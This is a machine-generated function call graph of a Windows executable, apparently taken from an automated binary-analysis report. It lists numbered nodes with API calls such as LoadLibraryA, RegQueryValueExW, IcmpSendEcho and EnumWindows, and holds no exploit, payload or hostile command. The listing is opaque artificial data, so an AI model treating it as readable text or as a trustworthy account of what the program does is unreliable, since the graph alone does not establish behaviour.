99610->99611 99612 42f4f 99611->99612 99613 50284 60 API calls 99612->99613 99614 42f5a 99613->99614 99615 42f65 99614->99615 99619 80177 99614->99619 99616 44c94 59 API calls 99615->99616 99618 42f71 99616->99618 99657 31307 99618->99657 99620 80191 99619->99620 99663 4151f 61 API calls 99619->99663 99622 42f84 Mailbox 99622->99501 99664 449c2 99623->99664 99658 31319 99657->99658 99662 31338 _memmove 99657->99662 99660 50fe6 Mailbox 59 API calls 99658->99660 99659 50fe6 Mailbox 59 API calls 99661 3134f 99659->99661 99660->99662 99661->99622 99662->99659 99663->99619 99848 44b29 99664->99848 99669 808bb 99671 44a2f 84 API calls 99669->99671 99670 449ed LoadLibraryExW 99858 44ade 99670->99858 99673 808c2 99671->99673 99675 44ade 3 API calls 99673->99675 99677 808ca 99675->99677 99884 44ab2 99677->99884 99897 44b77 99848->99897 99851 44b60 FreeLibrary 99852 449d4 99851->99852 99855 5547b 99852->99855 99853 44b77 2 API calls 99854 44b50 99853->99854 99854->99851 99854->99852 99901 55490 99855->99901 99857 449e1 99857->99669 99857->99670 99982 44baa 99858->99982 99861 44baa 2 API calls 99864 44b03 99861->99864 99862 44b15 FreeLibrary 99863 44a05 99862->99863 99865 448b0 99863->99865 99864->99862 99864->99863 99866 50fe6 Mailbox 59 API calls 99865->99866 99867 448c5 99866->99867 99868 4433f 59 API calls 99867->99868 99885 44ac4 99884->99885 99886 80945 99884->99886 100098 55802 99885->100098 99898 44b44 99897->99898 99899 44b80 LoadLibraryA 99897->99899 99898->99853 99898->99854 99899->99898 99900 44b91 GetProcAddress 99899->99900 99900->99898 99902 5549c _flsall 99901->99902 99903 554af 99902->99903 99905 554e0 99902->99905 99950 58d58 58 API calls __getptd_noexit 99903->99950 99920 60718 99905->99920 99906 554b4 99951 58fe6 9 API calls __woutput_l 99906->99951 99909 554e5 99910 554ee 99909->99910 99911 554fb 99909->99911 99952 58d58 58 API calls __getptd_noexit 99910->99952 99913 55525 99911->99913 99914 55505 99911->99914 99935 60837 99913->99935 99953 58d58 58 API calls __getptd_noexit 99914->99953 99915 554bf _flsall @_EH4_CallFilterFunc@8 99915->99857 99921 60724 _flsall 99920->99921 99922 59e3b __lock 58 API calls 99921->99922 99923 60732 99922->99923 99924 607ad 99923->99924 99931 59ec3 __mtinitlocknum 58 API calls 99923->99931 99933 607a6 99923->99933 99958 56e7d 59 API calls __lock 99923->99958 99959 56ee7 LeaveCriticalSection LeaveCriticalSection _doexit 99923->99959 99960 58a4d 58 API calls __malloc_crt 99924->99960 99927 60823 _flsall 99927->99909 99928 607b4 99928->99933 99961 5a05b InitializeCriticalSectionAndSpinCount 99928->99961 99931->99923 99932 607da EnterCriticalSection 99932->99933 99955 6082e 99933->99955 99944 60857 __wopenfile 99935->99944 99936 60871 99966 58d58 58 API calls __getptd_noexit 99936->99966 99938 60a2c 99938->99936 99942 60a8f 99938->99942 99944->99936 99944->99938 99968 539fb 60 API calls 2 library calls 99944->99968 99946 60a25 99946->99938 99950->99906 99951->99915 99952->99915 99953->99915 99962 59fa5 LeaveCriticalSection 99955->99962 99957 60835 99957->99927 99958->99923 99959->99923 99960->99928 99961->99932 99962->99957 99968->99946 99983 44af7 99982->99983 99984 44bb3 LoadLibraryA 99982->99984 99983->99861 99983->99864 99984->99983 99985 44bc4 GetProcAddress 99984->99985 99985->99983 100101 5581d 100098->100101 100102 55829 _flsall 100101->100102 100489 53465 _flsall 100488->100489 100490 59e3b __lock 51 API calls 100489->100490 100491 5346c 100490->100491 100492 5349a DecodePointer 100491->100492 100494 53525 _doexit 100491->100494 100492->100494 100495 534b1 DecodePointer 100492->100495 100508 53573 100494->100508 100507 534c1 100495->100507 100497 53582 _flsall 100497->99277 100499 534ce EncodePointer 100499->100507 100500 5356a 100501 532cf _fast_error_exit 3 API calls 100500->100501 100502 53573 100501->100502 100504 53580 100502->100504 100513 59fa5 LeaveCriticalSection 100502->100513 100503 534de DecodePointer EncodePointer 100505 534f0 DecodePointer DecodePointer 100503->100505 100504->99277 100505->100507 100507->100494 100507->100499 100507->100503 100509 53553 100508->100509 100510 53579 100508->100510 100509->100497 100512 59fa5 LeaveCriticalSection 100509->100512 100514 59fa5 LeaveCriticalSection 100510->100514 100512->100500 100513->100504 100514->100509 100515 44d83 100516 44dba 100515->100516 100517 44e37 100516->100517 100518 44dd8 100516->100518 100559 44e35 100516->100559 100520 44e3d 100517->100520 100521 809c2 100517->100521 100522 44de5 100518->100522 100523 44ead PostQuitMessage 100518->100523 100519 44e1a DefWindowProcW 100524 44e28 100519->100524 100525 44e65 SetTimer RegisterWindowMessageW 100520->100525 100526 44e42 100520->100526 100529 3c460 10 API calls 100521->100529 100527 44df0 100522->100527 100528 80a35 100522->100528 100523->100524 100525->100524 100532 44e8e CreatePopupMenu 100525->100532 100530 80965 100526->100530 100531 44e49 KillTimer 100526->100531 100533 44eb7 100527->100533 100534 44df8 100527->100534 100570 92cce 97 API calls _memset 100528->100570 100536 809e9 100529->100536 100539 8096a 100530->100539 100540 8099e MoveWindow 100530->100540 100541 45ac3 Shell_NotifyIconW 100531->100541 100532->100524 100560 45b29 100533->100560 100542 80a1a 100534->100542 100543 44e03 100534->100543 100537 3c483 295 API calls 100536->100537 100545 44e0e 100537->100545 100546 8098d SetFocus 100539->100546 100547 8096e 100539->100547 100540->100524 100548 44e5c 100541->100548 100542->100519 100569 88854 59 API calls Mailbox 100542->100569 100543->100545 100549 44e9b 100543->100549 100544 80a47 100544->100519 100544->100524 100545->100519 100556 45ac3 Shell_NotifyIconW 100545->100556 100546->100524 100547->100545 100550 80977 100547->100550 100567 334e4 DeleteObject DestroyWindow Mailbox 100548->100567 100568 45bd7 107 API calls _memset 100549->100568 100555 3c460 10 API calls 100550->100555 100554 44eab 100554->100524 100555->100524 100557 80a0e 100556->100557 100558 459d3 94 API calls 100557->100558 100558->100559 100559->100519 100561 45b40 _memset 100560->100561 100562 45bc2 100560->100562 100563 456f8 87 API calls 100561->100563 100562->100524 100565 45b67 100563->100565 100564 45bab KillTimer SetTimer 100564->100562 100565->100564 100566 80d6e Shell_NotifyIconW 100565->100566 100566->100564 100567->100524 100568->100554 100569->100559 100570->100544 100571 39a88 100574 386e0 100571->100574 100575 386fd 100574->100575 100576 70fad 100575->100576 100577 70ff8 100575->100577 100599 38724 100575->100599 100580 70fb5 100576->100580 100583 70fc2 100576->100583 100576->100599 100614 aaad0 295 API calls __cinit 100577->100614 100612 ab0e4 295 API calls 100580->100612 100582 52f70 __cinit 67 API calls 100582->100599 100587 3898d 100583->100587 100613 ab58c 295 API calls 3 library calls 100583->100613 100585 71289 100585->100585 100591 38a17 100587->100591 100617 9a48d 89 API calls 4 library calls 100587->100617 100588 711af 100616 aae3b 89 API calls 100588->100616 100592 339be 68 API calls 100592->100599 100596 3523c 59 API calls 100596->100599 100597 33f42 68 API calls 100597->100599 100598 33c30 68 API calls 100598->100599 100599->100582 100599->100587 100599->100588 100599->100591 100599->100592 100599->100596 100599->100597 100599->100598 100600 353b0 295 API calls 100599->100600 100601 41c9c 59 API calls 100599->100601 100603 33938 68 API calls 100599->100603 100604 3855e 295 API calls 100599->100604 100605 35278 100599->100605 100610 384e2 89 API calls 100599->100610 100611 3835f 295 API calls 100599->100611 100615 873ab 59 API calls 100599->100615 100600->100599 100601->100599 100603->100599 100604->100599 100606 50fe6 Mailbox 59 API calls 100605->100606 100607 35285 100606->100607 100608 35294 100607->100608 100609 41a36 59 API calls 100607->100609 100608->100599 100609->100608 100610->100599 100611->100599 100612->100583 100613->100587 100614->100599 100615->100599 100616->100587 100617->100585 100618 6b7ad 100621 3ad98 100618->100621 100622 72f63 DestroyWindow 100621->100622 100623 3add7 mciSendStringW 100621->100623 100636 72f6f 100622->100636 100624 3adf3 100623->100624 100625 3afc0 100623->100625 100627 3ae01 100624->100627 100624->100636 100625->100624 100626 3afcf UnregisterHotKey 100625->100626 100626->100625 100655 3c71f 100627->100655 100630 72f8d FindClose 100630->100636 100631 72fb4 100634 72fc7 FreeLibrary 100631->100634 100635 72fd8 100631->100635 100632 3ae16 100632->100635 100642 3ae24 100632->100642 100633 442cf CloseHandle 100633->100636 100634->100631 100637 72fec VirtualFree 100635->100637 100644 3ae91 100635->100644 100636->100630 100636->100631 100636->100633 100637->100635 100638 3ae80 OleUninitialize 100638->100644 100639 73033 100645 73042 100639->100645 100661 9a240 CloseHandle 100639->100661 100640 3ae9c 100643 3aeac Mailbox 100640->100643 100642->100638 100659 4fef1 61 API calls Mailbox 100643->100659 100644->100639 100644->100640 100650 73056 100645->100650 100662 8d5cb 59 API calls Mailbox 100645->100662 100647 3aec2 Mailbox 100660 5052f 59 API calls Mailbox 100647->100660 100656 3c72e Mailbox 100655->100656 100657 3ae08 100656->100657 100663 8e0aa 59 API calls 100656->100663 100657->100631 100657->100632 100659->100647 100661->100639 100662->100645 100663->100656 100664 338ce 100665 338d8 100664->100665 100669 338f9 100664->100669 100666 33b31 59 API calls 100665->100666 100668 338e8 100666->100668 100670 33b31 59 API calls 100668->100670 100671 6d352 100669->100671 100673 86d17 59 API calls 100669->100673 100672 338f8 100670->100672 100673->100669 100674 39a6c 100677 3829c 100674->100677 100676 39a78 100678 382b4 100677->100678 100679 38308 100677->100679 100678->100679 100682 353b0 295 API calls 100678->100682 100681 38331 100679->100681 100686 9a48d 89 API calls 4 library calls 100679->100686 100681->100676 100684 382eb 100682->100684 100683 70ed8 100683->100683 100684->100681 100685 3523c 59 API calls 100684->100685 100685->100679 100686->100683 100687 6dcb4 100688 50fe6 Mailbox 59 API calls 100687->100688 100689 6dcbb 100688->100689 100691 34e77 100689->100691 100692 95f90 100689->100692 100693 95fb3 100692->100693 100694 96066 100693->100694 100695 50fe6 Mailbox 59 API calls 100693->100695 100694->100691 100699 95fef 100695->100699 100696 9600e 100696->100694 100698 41c9c 59 API calls 100696->100698 100698->100696 100699->100696 100700 96071 59 API calls 100699->100700 100700->100699 100701 37357 100702 37360 100701->100702 100703 378f5 100701->100703 100702->100703 100704 34d37 84 API calls 100702->100704 100710 36fdb Mailbox 100703->100710 100718 887f9 59 API calls _memmove 100703->100718 100705 3738b 100704->100705 100705->100703 100706 3739b 100705->100706 100712 41680 100706->100712 100709 6f91b 100711 41c9c 59 API calls 100709->100711 100711->100710 100713 41692 100712->100713 100716 416ba _memmove 100712->100716 100714 50fe6 Mailbox 59 API calls 100713->100714 100713->100716 100717 4176f _memmove 100714->100717 100715 50fe6 Mailbox 59 API calls 100715->100717 100716->100710 100717->100715 100718->100709 100719 31016 100724 45ce7 100719->100724 100722 52f70 __cinit 67 API calls 100723 31025 100722->100723 100725 50fe6 Mailbox 59 API calls 100724->100725 100726 45cef 100725->100726 100727 3101b 100726->100727 100731 45f39 100726->100731 100727->100722 100732 45cfb 100731->100732 100733 45f42 100731->100733 100735 45d13 100732->100735 100734 52f70 __cinit 67 API calls 100733->100734 100734->100732 100736 41207 59 API calls 100735->100736 100737 45d2b GetVersionExW 100736->100737 100738 41821 59 API calls 100737->100738 100739 45d6e 100738->100739 100740 41981 59 API calls 100739->100740 100744 45d9b 100739->100744 100741 45d8f 100740->100741 100742 4133d 59 API calls 100741->100742 100742->100744 100743 45e00 GetCurrentProcess IsWow64Process 100746 45e19 100743->100746 100744->100743 100745 81098 100744->100745 100747 45e2f 100746->100747 100748 45e98 GetSystemInfo 100746->100748 100759 455f0 100747->100759 100749 45e65 100748->100749 100749->100727 100752 45e41 100755 455f0 2 API calls 100752->100755 100753 45e8c GetSystemInfo 100754 45e56 100753->100754 100754->100749 100757 45e5c FreeLibrary 100754->100757 100756 45e49 GetNativeSystemInfo 100755->100756 100756->100754 100757->100749 100760 45619 100759->100760 100761 455f9 LoadLibraryA 100759->100761 100760->100752 100760->100753 100761->100760 100762 4560a GetProcAddress 100761->100762 100762->100760 100763 31055 100768 32a19 100763->100768 100766 52f70 __cinit 67 API calls 100767 31064 100766->100767 100769 41207 59 API calls 100768->100769 100770 32a87 100769->100770 100775 31256 100770->100775 100772 32b24 100774 3105a 100772->100774 100778 313f8 59 API calls 2 library calls 100772->100778 100774->100766 100779 31284 100775->100779 100778->100772 100780 31275 100779->100780 100781 31291 100779->100781 100780->100772 100781->100780 100782 31298 RegOpenKeyExW 100781->100782 100782->100780 100783 312b2 RegQueryValueExW 100782->100783 100784 312e8 RegCloseKey 100783->100784 100785 312d3 100783->100785 100784->100780 100785->100784 100786 35ff5 100814 35ede Mailbox _memmove 100786->100814 100787 50fe6 59 API calls Mailbox 100787->100814 100788 36a9b 100974 3a9de 295 API calls 100788->100974 100789 353b0 295 API calls 100789->100814 100791 36abc 100984 9a48d 89 API calls 4 library calls 100791->100984 100792 6eff9 100793 35190 Mailbox 59 API calls 100792->100793 100796 6efeb 100793->100796 100794 6f007 100986 9a48d 89 API calls 4 library calls 100794->100986 100843 35569 Mailbox 100796->100843 100985 86cf1 59 API calls Mailbox 100796->100985 100799 360e5 100799->100791 100800 6e137 100799->100800 100807 363bd Mailbox 100799->100807 100828 36152 Mailbox 100799->100828 100800->100807 100975 87aad 59 API calls 100800->100975 100801 41c9c 59 API calls 100801->100814 100803 41a36 59 API calls 100803->100814 100804 50fe6 Mailbox 59 API calls 100808 363d1 100804->100808 100805 3523c 59 API calls 100805->100814 100807->100804 100815 36426 100807->100815 100808->100791 100810 363de 100808->100810 100809 ac355 295 API calls 100809->100814 100811 36413 100810->100811 100812 6e172 100810->100812 100811->100815 100842 35447 Mailbox 100811->100842 100976 ac87c 85 API calls 2 library calls 100812->100976 100814->100787 100814->100788 100814->100789 100814->100791 100814->100792 100814->100794 100814->100799 100814->100801 100814->100803 100814->100805 100814->100809 100814->100843 100978 97f11 59 API calls Mailbox 100814->100978 100979 86cf1 59 API calls Mailbox 100814->100979 100977 ac9c9 95 API calls Mailbox 100815->100977 100819 6e19d 100819->100819 100820 50fe6 59 API calls Mailbox 100820->100842 100821 35190 Mailbox 59 API calls 100821->100828 100822 6f165 100988 9a48d 89 API calls 4 library calls 100822->100988 100823 6e691 100981 9a48d 89 API calls 4 library calls 100823->100981 100825 36e30 60 API calls 100825->100842 100826 369fa 100835 41c9c 59 API calls 100826->100835 100828->100791 100828->100796 100828->100821 100831 6e2e9 VariantClear 100828->100831 100828->100843 100852 94fec GetFileAttributesW 100828->100852 100853 ae60c 130 API calls 100828->100853 100855 af1b2 91 API calls 100828->100855 100857 aec68 100828->100857 100865 b5bd1 100828->100865 100895 aebba 100828->100895 100901 3cfd7 100828->100901 100920 9ac0d 100828->100920 100948 a5e1d 100828->100948 100980 87aad 59 API calls 100828->100980 100829 41c9c 59 API calls 100829->100842 100830 6e6a0 100831->100828 100832 6ea9a 100836 41c9c 59 API calls 100832->100836 100834 369ff 100834->100822 100834->100823 100835->100843 100836->100843 100838 41207 59 API calls 100838->100842 100839 6eb67 100839->100843 100982 87aad 59 API calls 100839->100982 100840 87aad 59 API calls 100840->100842 100842->100820 100842->100823 100842->100825 100842->100826 100842->100829 100842->100832 100842->100834 100842->100838 100842->100839 100842->100840 100842->100843 100844 52f70 67 API calls __cinit 100842->100844 100845 6ef28 100842->100845 100847 35a1a 100842->100847 100973 37e50 295 API calls 2 library calls 100842->100973 100844->100842 100983 9a48d 89 API calls 4 library calls 100845->100983 100987 9a48d 89 API calls 4 library calls 100847->100987 100852->100828 100853->100828 100855->100828 100858 aecab 100857->100858 100864 aec84 100857->100864 100859 aeccd 100858->100859 100860 3502b 59 API calls 100858->100860 100861 3502b 59 API calls 100859->100861 100862 aed11 100859->100862 100859->100864 100860->100859 100861->100862 100989 967fc 100862->100989 100864->100828 100866 50fe6 Mailbox 59 API calls 100865->100866 100867 b5be9 100866->100867 100868 4433f 59 API calls 100867->100868 100869 b5bf4 100868->100869 101051 34f98 100869->101051 100872 41821 59 API calls 100873 b5c1e 100872->100873 100874 b5c28 100873->100874 100875 34d37 84 API calls 100873->100875 101064 36d79 100874->101064 100876 b5c40 100875->100876 101077 34f3c 59 API calls Mailbox 100876->101077 100880 b5c4e 100880->100874 100883 34d37 84 API calls 100880->100883 100881 347be 59 API calls 100882 b5cbd 100881->100882 100884 34540 59 API calls 100882->100884 100885 b5c61 100883->100885 100886 b5cd1 100884->100886 100887 41c9c 59 API calls 100885->100887 100888 343d0 59 API calls 100886->100888 100887->100874 100889 b5cf2 100888->100889 100890 b5c7d 100889->100890 100891 b5d09 GetWindowTextW 100889->100891 100893 41a36 59 API calls 100889->100893 100894 343d0 59 API calls 100889->100894 100890->100828 100892 50fe6 Mailbox 59 API calls 100891->100892 100892->100889 100893->100889 100894->100889 100899 aebcd 100895->100899 100896 34d37 84 API calls 100897 aec0a 100896->100897 101171 97ce4 100897->101171 100899->100896 100900 aebdc 100899->100900 100900->100828 100902 34d37 84 API calls 100901->100902 100903 3d001 100902->100903 100904 35278 59 API calls 100903->100904 100905 3d018 100904->100905 100906 3d57b 100905->100906 100907 3502b 59 API calls 100905->100907 100913 3d439 Mailbox __NMSG_WRITE 100905->100913 100906->100828 100907->100913 100908 5312d _W_store_winword 60 API calls 100908->100913 100909 50c65 62 API calls 100909->100913 100910 4162d 59 API calls 100910->100913 100911 34f98 59 API calls 100911->100913 100913->100906 100913->100908 100913->100909 100913->100910 100913->100911 100915 34d37 84 API calls 100913->100915 100916 3502b 59 API calls 100913->100916 100917 41821 59 API calls 100913->100917 100918 459d3 94 API calls 100913->100918 100919 45ac3 Shell_NotifyIconW 100913->100919 101212 4153b 59 API calls 2 library calls 100913->101212 101213 34f3c 59 API calls Mailbox 100913->101213 100915->100913 100916->100913 100917->100913 100918->100913 100919->100913 100921 34d37 84 API calls 100920->100921 100922 9ac33 100921->100922 100923 41a36 59 API calls 100922->100923 100924 9ac41 SetErrorMode 100923->100924 100925 9ac78 100924->100925 100947 9acee 100924->100947 100926 94fec GetFileAttributesW 100925->100926 100927 9ac81 100926->100927 100927->100947 101214 9441c 100927->101214 100929 9ae00 SetErrorMode 100931 9ae10 Mailbox 100929->100931 100931->100828 100932 9acb8 101219 9fa36 100932->101219 100933 3502b 59 API calls 100935 9aca4 100933->100935 100937 3502b 59 API calls 100935->100937 100936 9acea 100938 347be 59 API calls 100936->100938 100936->100947 100937->100932 100939 9ad08 100938->100939 100940 34540 59 API calls 100939->100940 100941 9ad14 100940->100941 100942 343d0 59 API calls 100941->100942 100943 9ad41 100942->100943 100944 343d0 59 API calls 100943->100944 100945 9ad78 100944->100945 100946 343d0 59 API calls 100945->100946 100946->100947 100947->100929 100949 a5e46 100948->100949 100950 a5e74 WSAStartup 100949->100950 100952 3502b 59 API calls 100949->100952 100951 a5e9d 100950->100951 100972 a5e88 Mailbox 100950->100972 101234 440cd 100951->101234 100954 a5e61 100952->100954 100954->100950 100956 3502b 59 API calls 100954->100956 100958 a5e70 100956->100958 100957 34d37 84 API calls 100959 a5eb2 100957->100959 100958->100950 101239 4402a WideCharToMultiByte 100959->101239 100961 a5ebf inet_addr gethostbyname 100962 a5edd IcmpCreateFile 100961->100962 100961->100972 100963 a5f01 100962->100963 100962->100972 100964 50fe6 Mailbox 59 API calls 100963->100964 100965 a5f1a 100964->100965 100966 4433f 59 API calls 100965->100966 100967 a5f25 100966->100967 100968 a5f34 IcmpSendEcho 100967->100968 100969 a5f55 IcmpSendEcho 100967->100969 100971 a5f6d 100968->100971 100969->100971 100970 a5fd4 IcmpCloseHandle WSACleanup 100970->100972 100971->100970 100972->100828 100973->100842 100974->100791 100975->100807 100976->100815 100977->100819 100978->100814 100979->100814 100980->100828 100981->100830 100982->100843 100983->100847 100984->100796 100985->100843 100986->100796 100987->100843 100988->100843 100992 96818 100989->100992 100991 96813 100991->100864 101025 96735 100992->101025 100995 96899 101041 96a73 89 API calls 2 library calls 100995->101041 100996 968b1 100998 96921 100996->100998 101001 96917 100996->101001 101006 968ca 100996->101006 100999 9699f 100998->100999 101000 96951 100998->101000 101019 9683d _memmove 100998->101019 101002 96a3a 100999->101002 101003 969a6 100999->101003 101004 96971 101000->101004 101005 96956 101000->101005 101001->100998 101007 968fe 101001->101007 101002->101019 101050 350d5 59 API calls 101002->101050 101008 969a9 101003->101008 101009 96a1c 101003->101009 101004->101019 101046 35087 59 API calls 101004->101046 101005->101019 101045 35087 59 API calls 101005->101045 101042 98cd0 61 API calls 101006->101042 101032 97c7f 101007->101032 101014 969ad 101008->101014 101015 969e5 101008->101015 101009->101019 101049 350d5 59 API calls 101009->101049 101014->101019 101047 350d5 59 API calls 101014->101047 101015->101019 101048 350d5 59 API calls 101015->101048 101019->100991 101020 968d2 101043 98cd0 61 API calls 101020->101043 101023 968e9 _memmove 101044 98cd0 61 API calls 101023->101044 101026 96785 101025->101026 101030 96746 101025->101030 101027 3502b 59 API calls 101026->101027 101031 96783 101027->101031 101028 34d37 84 API calls 101028->101030 101029 5312d _W_store_winword 60 API calls 101029->101030 101030->101028 101030->101029 101030->101031 101031->100995 101031->100996 101031->101019 101033 97c8a 101032->101033 101034 50fe6 Mailbox 59 API calls 101033->101034 101035 97c91 101034->101035 101036 97c9d 101035->101036 101037 97cbe 101035->101037 101038 50fe6 Mailbox 59 API calls 101036->101038 101039 50fe6 Mailbox 59 API calls 101037->101039 101040 97ca6 _memset 101038->101040 101039->101040 101040->101019 101041->101019 101042->101020 101043->101023 101044->101007 101045->101019 101046->101019 101047->101019 101048->101019 101049->101019 101050->101019 101052 34fa8 101051->101052 101053 6dd2b 101051->101053 101057 50fe6 Mailbox 59 API calls 101052->101057 101054 6dd3c 101053->101054 101055 41821 59 API calls 101053->101055 101056 419e1 59 API calls 101054->101056 101055->101054 101059 6dd46 101056->101059 101058 34fbb 101057->101058 101058->101059 101060 34fc6 101058->101060 101061 34fd4 101059->101061 101062 41207 59 API calls 101059->101062 101060->101061 101063 41a36 59 API calls 101060->101063 101061->100872 101062->101061 101063->101061 101065 36d8e Mailbox 101064->101065 101066 6f3d1 101065->101066 101067 36d9d 101065->101067 101070 6f3dc IsWindow 101066->101070 101068 36da2 101067->101068 101069 34d37 84 API calls 101067->101069 101068->100881 101068->100890 101071 36db8 101069->101071 101070->101068 101072 6f3f0 101070->101072 101078 50429 101071->101078 101132 503f8 59 API calls Mailbox 101072->101132 101075 6f3fc 101076 31307 59 API calls 101075->101076 101076->101068 101077->100880 101079 5043f Mailbox 101078->101079 101080 41c9c 59 API calls 101079->101080 101081 50463 101080->101081 101082 41c9c 59 API calls 101081->101082 101083 5046e 101082->101083 101084 41821 59 API calls 101083->101084 101085 5047e 101084->101085 101086 41207 59 API calls 101085->101086 101087 504ac 101086->101087 101088 41207 59 API calls 101087->101088 101089 504b5 101088->101089 101090 41207 59 API calls 101089->101090 101091 504be 101090->101091 101092 863f4 101091->101092 101093 504d1 101091->101093 101134 8b8b6 61 API calls 3 library calls 101092->101134 101094 8640e 101093->101094 101096 504e3 GetForegroundWindow 101093->101096 101097 41609 59 API calls 101094->101097 101133 503f8 59 API calls Mailbox 101096->101133 101099 86422 101097->101099 101101 86728 101099->101101 101103 41609 59 API calls 101099->101103 101100 504f1 101102 31307 59 API calls 101100->101102 101105 41c9c 59 API calls 101101->101105 101106 8673a 101101->101106 101104 50506 101102->101104 101130 86438 101103->101130 101121 50509 Mailbox 101104->101121 101105->101106 101107 86765 101106->101107 101109 41aa4 59 API calls 101106->101109 101108 86780 101107->101108 101114 41aa4 59 API calls 101107->101114 101112 8679a EnumWindows 101108->101112 101113 8678b GetDesktopWindow EnumChildWindows 101108->101113 101110 8675d CharUpperBuffW 101109->101110 101110->101107 101115 867a0 101112->101115 101140 8ba6d 101112->101140 101113->101115 101116 86778 CharUpperBuffW 101114->101116 101138 8b81a 59 API calls Mailbox 101115->101138 101116->101108 101118 867cf 101119 867b1 Mailbox 101119->101118 101139 503f8 59 API calls Mailbox 101119->101139 101121->101068 101122 866cf GetForegroundWindow 101124 866c9 101122->101124 101123 866aa 101125 866b7 IsWindow 101123->101125 101124->101121 101124->101122 101137 503f8 59 API calls Mailbox 101124->101137 101125->101121 101125->101124 101127 41c9c 59 API calls 101127->101130 101129 410f4 59 API calls 101129->101130 101130->101101 101130->101121 101130->101123 101130->101124 101130->101127 101130->101129 101131 537ba 59 API calls 101130->101131 101135 8aabc 60 API calls 101130->101135 101136 41138 62 API calls Mailbox 101130->101136 101131->101130 101132->101075 101133->101100 101134->101094 101135->101130 101136->101130 101137->101124 101138->101119 101139->101118 101141 8ba79 101140->101141 101142 8baa4 GetClassNameW 101141->101142 101143 8bac7 _wcscmp 101141->101143 101142->101143 101144 8badd GetWindowTextW 101143->101144 101162 8bb83 _wcscmp 101143->101162 101145 8baf6 __NMSG_WRITE 101144->101145 101156 8bb0d _wcscmp __wopenfile _wcsstr 101144->101156 101149 8bb00 CharUpperBuffW 101145->101149 101146 8bb98 GetWindowTextW 101148 41a36 59 API calls 101146->101148 101147 8bc19 GetClassNameW 101151 41a36 59 API calls 101147->101151 101152 8bbb9 101148->101152 101149->101156 101150 8bc76 101154 8bc87 GetWindowRect 101150->101154 101160 8bc9c 101150->101160 101153 8bc3a 101151->101153 101168 411ea 59 API calls 101152->101168 101169 411ea 59 API calls 101153->101169 101154->101160 101157 8bb61 GetClassNameW 101156->101157 101156->101162 101157->101162 101161 8bd24 101160->101161 101163 31307 59 API calls 101160->101163 101162->101146 101167 8bc03 _wcscmp 101162->101167 101163->101161 101164 8bbc6 Mailbox 101166 8bbe1 GetClassNameW 101164->101166 101164->101167 101165 8bc47 Mailbox 101165->101150 101170 8bd40 SendMessageTimeoutW EnumChildWindows 101165->101170 101166->101167 101167->101147 101167->101165 101168->101164 101169->101165 101170->101150 101172 97cf1 101171->101172 101173 50fe6 Mailbox 59 API calls 101172->101173 101174 97cf8 101173->101174 101177 96135 101174->101177 101176 97d3b Mailbox 101176->100900 101178 41aa4 59 API calls 101177->101178 101179 96148 CharLowerBuffW 101178->101179 101181 9615b 101179->101181 101180 41609 59 API calls 101180->101181 101181->101180 101182 96195 101181->101182 101194 96165 _memset Mailbox 101181->101194 101183 961a7 101182->101183 101184 41609 59 API calls 101182->101184 101185 50fe6 Mailbox 59 API calls 101183->101185 101184->101183 101188 961d5 101185->101188 101190 961f4 101188->101190 101210 96071 59 API calls 101188->101210 101189 96233 101191 50fe6 Mailbox 59 API calls 101189->101191 101189->101194 101195 96292 101190->101195 101192 9624d 101191->101192 101193 50fe6 Mailbox 59 API calls 101192->101193 101193->101194 101194->101176 101196 41207 59 API calls 101195->101196 101197 962c4 101196->101197 101198 41207 59 API calls 101197->101198 101199 962cd 101198->101199 101200 41207 59 API calls 101199->101200 101207 962d6 _wcscmp 101200->101207 101201 4153b 59 API calls 101201->101207 101202 41821 59 API calls 101202->101207 101203 53836 GetStringTypeW 101203->101207 101205 96292 60 API calls 101205->101207 101206 537ba 59 API calls 101206->101207 101207->101201 101207->101202 101207->101203 101207->101205 101207->101206 101208 965ab Mailbox 101207->101208 101209 41c9c 59 API calls 101207->101209 101211 5385c GetStringTypeW _iswctype 101207->101211 101208->101189 101209->101207 101210->101188 101211->101207 101212->100913 101213->100913 101215 41609 59 API calls 101214->101215 101216 94429 101215->101216 101217 9443b 101216->101217 101218 41900 59 API calls 101216->101218 101217->100932 101217->100933 101218->101217 101220 41a36 59 API calls 101219->101220 101221 9fa50 101220->101221 101222 41900 59 API calls 101221->101222 101223 9fa77 FindFirstFileW 101222->101223 101224 9fb95 FindClose 101223->101224 101230 9fa95 _wcscmp 101223->101230 101226 9fba4 Mailbox 101224->101226 101225 352b0 7 API calls 101225->101230 101226->100936 101227 9fb8e 101227->101224 101228 9fab1 Sleep 101228->101230 101229 9fb76 FindNextFileW 101229->101227 101229->101230 101230->101225 101230->101227 101230->101228 101230->101229 101231 41c9c 59 API calls 101230->101231 101232 41900 59 API calls 101230->101232 101233 9fa36 66 API calls 101230->101233 101231->101230 101232->101230 101233->101230 101235 50fe6 Mailbox 59 API calls 101234->101235 101236 440e0 101235->101236 101237 41c7e 59 API calls 101236->101237 101238 440ed 101237->101238 101238->100957 101240 44085 101239->101240 101241 4404e 101239->101241 101248 43f20 59 API calls Mailbox 101240->101248 101242 50fe6 Mailbox 59 API calls 101241->101242 101244 44055 WideCharToMultiByte 101242->101244 101247 43f79 59 API calls 2 library calls 101244->101247 101246 44077 101246->100961 101247->101246 101248->101246 101249 6dc5a 101250 50fe6 Mailbox 59 API calls 101249->101250 101251 6dc61 101250->101251 101252 50fe6 Mailbox 59 API calls 101251->101252 101254 6dc7a _memmove 101251->101254 101252->101254 101253 50fe6 Mailbox 59 API calls 101255 6dc9f 101253->101255 101254->101253 101256 748fb 101257 3b020 295 API calls 101256->101257 101258 74912 101257->101258 101260 3cce0 101258->101260 101261 9a48d 89 API calls 4 library calls 101258->101261 101260->101260 101261->101260 101262 3107d 101267 42fc5 101262->101267 101264 3108c 101265 52f70 __cinit 67 API calls 101264->101265 101266 31096 101265->101266 101268 42fd5 __write_nolock 101267->101268 101269 41207 59 API calls 101268->101269 101270 4308b 101269->101270 101271 500cf 61 API calls 101270->101271 101272 43094 101271->101272 101298 508c1 101272->101298 101275 41900 59 API calls 101276 430ad 101275->101276 101277 44c94 59 API calls 101276->101277 101278 430bc 101277->101278 101279 41207 59 API calls 101278->101279 101280 430c5 101279->101280 101281 419e1 59 API calls 101280->101281 101282 430ce RegOpenKeyExW 101281->101282 101283 430f0 Mailbox 101282->101283 101284 801a3 RegQueryValueExW 101282->101284 101283->101264 101285 801c0 101284->101285 101286 80235 RegCloseKey 101284->101286 101287 50fe6 Mailbox 59 API calls 101285->101287 101286->101283 101297 80247 _wcscat Mailbox __NMSG_WRITE 101286->101297 101288 801d9 101287->101288 101290 4433f 59 API calls 101288->101290 101289 41609 59 API calls 101289->101297 101291 801e4 RegQueryValueExW 